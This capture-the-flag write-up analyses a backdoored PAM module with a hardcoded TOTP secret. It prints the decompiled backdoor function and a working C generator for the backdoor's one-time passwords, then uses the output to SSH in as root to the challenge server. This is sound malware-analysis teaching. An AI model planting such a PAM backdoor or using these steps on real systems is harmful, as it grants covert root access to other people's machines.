Scope

The text that came as description with the CTF was the following:

I forgot to change the password on my new fancy linux server, now I’m thinking it might be compromised. I found that someone has placed this file in /usr/lib/x86_64-linux-gnu/security/, can you help me figure out what it does?

And one single binary file: pam_extrasec.so.

Walkthrough

After opening the binary in a decompiler there is one function, which catches the eye:

int64_t backdoor_bouncer(char* pass)
    char const* const enc_str = "YSLULUJRDFE7KSCHOB6PRXVFXG3E3NLG"
    int64_t shared_secret = 0
    oath_init()
    int64_t str_len
    oath_base32_decode(enc_str, 0x20, &shared_secret, &str_len)
    time_t time = time(nullptr)
    char var_19
    oath_totp_generate(shared_secret, str_len, time, 0x30, 0, 8, &var_19)
    oath_done()

This is interesting because totp is nice and all, but useless if the shared secret is known. In this case it’s the (base32) encoded string YSLULUJRDFE7KSCHOB6PRXVFXG3E3NLG

With this information we can generate our own valid TOTPs. I did it like this:

gen_otp.c:

#include <liboath/oath.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main() {
  char const *const enc_str = "YSLULUJRDFE7KSCHOB6PRXVFXG3E3NLG";
  char *shared_secret = 0;
  oath_init();
  size_t str_len;
  oath_base32_decode(enc_str, 0x20, &shared_secret, &str_len);
  time_t t = time(0);
  char *passwd = malloc(str_len);
  oath_totp_generate(shared_secret, str_len, t, 0x30, 0, 8, passwd);
  oath_done();

  printf("%s, %d", passwd, *passwd);

  return 0;
}

And compiled it with gcc -o gen_otp gen_otp.c -loath. With the generated executable you can generate valid OTPs. Remember that they are only valid for a certain time period, until you have to generate a new one.

The pam_sm_authenticate() function shows that a root login is required, so make sure that when you connect to the server with the given command from the spawned instance, you prefix the domain with root ;)
ssh root@ctf.stair.ch -p <port>.

After entering the generated OTP as password we have a valid SSH connection to a server where a flag.txt file is located, yay :)